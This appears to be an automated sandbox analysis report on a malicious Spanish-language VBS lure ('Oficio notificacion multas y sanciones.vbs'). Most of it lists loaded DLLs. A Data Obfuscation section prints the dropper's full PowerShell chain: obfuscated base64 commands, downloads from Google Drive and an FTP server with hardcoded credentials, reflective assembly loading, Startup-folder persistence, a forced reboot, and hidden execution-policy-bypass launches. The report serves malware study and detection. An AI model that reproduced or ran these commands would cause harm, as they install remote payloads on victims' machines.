                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

                        Data Obfuscation

                        barindex
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell") : OaVMr.Run( "powershell -command ""$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???QwBC???Gw???J??????7???Ck???JwB??????E??????c???BK???Dg???Nw???1???DE???MgBv??
                        Source: 4.2.powershell.exe.1d3944eae80.0.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                        Source: 4.2.powershell.exe.1d3ab580000.2.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                        Source: 4.2.powershell.exe.1d3930c6538.1.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                        Source: 12.2.powershell.exe.20a2a7d7a88.0.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                        Source: 12.2.powershell.exe.20a2a7dbe00.1.raw.unpack, Program.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
                        Source: 18.2.powershell.exe.2078fd80b60.1.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                        Source: 18.2.powershell.exe.2078fd84ec0.0.raw.unpack, Program.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
                        Source: 23.2.powershell.exe.20958f44b38.1.raw.unpack, Program.cs.Net Code: Plugin System.Reflection.Assembly.Load(byte[])
                        Source: 23.2.powershell.exe.20958f407d8.2.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                        Source: 23.2.powershell.exe.20958820000.0.raw.unpack, -.cs.Net Code: _FDD0 System.Reflection.Assembly.Load(byte[])
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String( $kahlN ) ); $vQpeD = $vQpeD[-1..-$vQpeD.Length] -join '';$vQpeD = $vQpeD.replace('%XRqhI%','C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs');powershell $vQpeD$glo
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQB0???Hk???QgBb???Ds???Jw???l???Ek???a???Bx???FI???W??????l???Cc???I??????9???C??????W???BQ???FU???dQBo???CQ???Ow???p???C??????ZwBT???Ho???QwBC???Gw???J??????g???Cg???ZwBu???Gk???cgB0???FM???Z???Bh???G8???b???Bu???Hc???bwBE???C4???egB0???Hg???a??????k???C??????PQ???g???Gc???UwB6???EM???QgBs???CQ???Ow???4???EY???V???BV???Do???OgBd???Gc???bgBp???GQ???bwBj???G4???RQ???u???HQ???e???Bl???FQ???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Gc???bgBp???GQ???bwBj???G4???RQ???u???Ho???d???B4???Gg???J??????7???Ck???d???Bu???GU???aQBs???EM???YgBl???Fc???LgB0???GU???Tg???g???HQ???YwBl???Go???YgBP???C0???dwBl???E4???K??????g???D0???I???B6???HQ???e???Bo???CQ???Ow???p???Cg???ZQBz???G8???c???Bz???Gk???Z??????u???Ho???d???B4???Gg???J??????7???Ck???I??????n???HQ???e???B0???C4???MQ???w???Ew???T???BE???C8???MQ???w???C8???cgBl???HQ???c???B5???HI???YwBw???FU???LwBy???GI???LgBt???G8???Yw???u???HQ???YQBy???GI???dgBr???GM???cwBl???GQ???LgBw???HQ???ZgB??????DE???d???Bh???HI???YgB2???Gs???YwBz???GU???Z??????v???C8???OgBw???HQ???Zg???n???C??????K???Bn???G4???aQBy???HQ???UwBk???GE???bwBs???G4???dwBv???EQ???LgB6???HQ???e???Bo???CQ???I??????9???C??????ZwBT???Ho???Qw
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $ZEnbP = $host.Version.Major.Equals(2) ;if ( $ZEnbP ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$jVyJn = (New-Object Net.WebClient);$jVyJn.Encoding = [System.Text.Encoding]::UTF8;$jVyJn.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$hxtz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $hxtz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$hxtz.dispose();$hxtz = (New-Object Net.WebClient);$hxtz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $hxtz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Oficio notificacion multas y sanciones.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( '2b491e528cd1-6cfb-b104-be87-06a096ec=nekot&aidem=tla?txt.soveun-soivne/o/moc.topsppa.6d4cd-sagracsed/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $huUPX , 'true' ) );};"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\yoexw.ps1' ";exit
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9???Ds???KQ???g???Ck???I??????n???GU???dQBy???HQ???Jw???g???Cw???I???BY???F??????VQB1???Gg???J??????g???Cw???I??????n???Gg???d???B0???H??????cw???6???C8???LwBm???Gk???cgBl???GI???YQBz???GU???cwB0???G8???cgBh???Gc???ZQ???u???Gc???bwBv???Gc???b???Bl???GE???c???Bp???HM???LgBj???G8???bQ???v???HY???M??????v???GI???LwBk???GU???cwBj???GE???cgBn???GE???cw???t???GQ???Yw???0???GQ???Ng???u???GE???c???Bw???HM???c???Bv???HQ???LgBj???G8???bQ???v???G8???LwBl???G4???dgBp???G8???cw???t???G4???dQBl???HY???bwBz???C4???d???B4???HQ???PwBh???Gw???d??????9???G0???ZQBk???Gk???YQ???m???HQ???bwBr???GU???bg???9???GM???ZQ???2???Dk???M???Bh???DY???M??????t???Dc???O???Bl???GI???LQ???0???D??????MQBi???C0???YgBm???GM???Ng???t???DE???Z???Bj???Dg???Mg???1???GU???MQ???5???DQ???Yg???y???Cc???I??????o???C??????XQBd???Fs???d???Bj???GU???agBi???G8???Ww???g???Cw???I???Bs???Gw???dQBu???CQ???I??????o???GU???awBv???HY???bgBJ???C4???KQ???g???Cc???SQBW???EY???cgBw???Cc???I??????o???GQ???bwBo???HQ???ZQBN???HQ???ZQBH???C4???KQ???n???DE???cwBz???GE???b???BD???C4???MwB5???HI???YQBy???GI???aQBM???HM???cwBh???Gw???Qw???n???Cg???ZQBw???Hk???V???B0???GU???Rw???u???Ck???I???Ba???GM???QgBj???GE???J??????g???Cg???Z???Bh???G8???T??????u???G4???aQBh???G0???bwBE???HQ???bgBl???HI???cgB1???EM???Og???6???F0???bgBp???GE???bQBv???EQ???c???Bw???EE???LgBt???GU???d???Bz???Hk???UwBb???Ds???KQ???g???Ck???I??????n???EE???Jw???g???Cw???I??????n???JMhOgCTISc???I??????o???GU???YwBh???Gw???c???Bl???FI???LgBn???FM???egBD???EI???b??????k???C??????K???Bn???G4???aQBy???HQ???Uw???0???DY???ZQBz???GE???QgBt???G8???cgBG???Do???OgBd???HQ???cgBl???HY???bgBv???EM???LgBt???GU???d???Bz???Hk???UwBb???C??????PQ???g???Fo???YwBC???GM???YQ???k???C??????XQBd???Fs???ZQ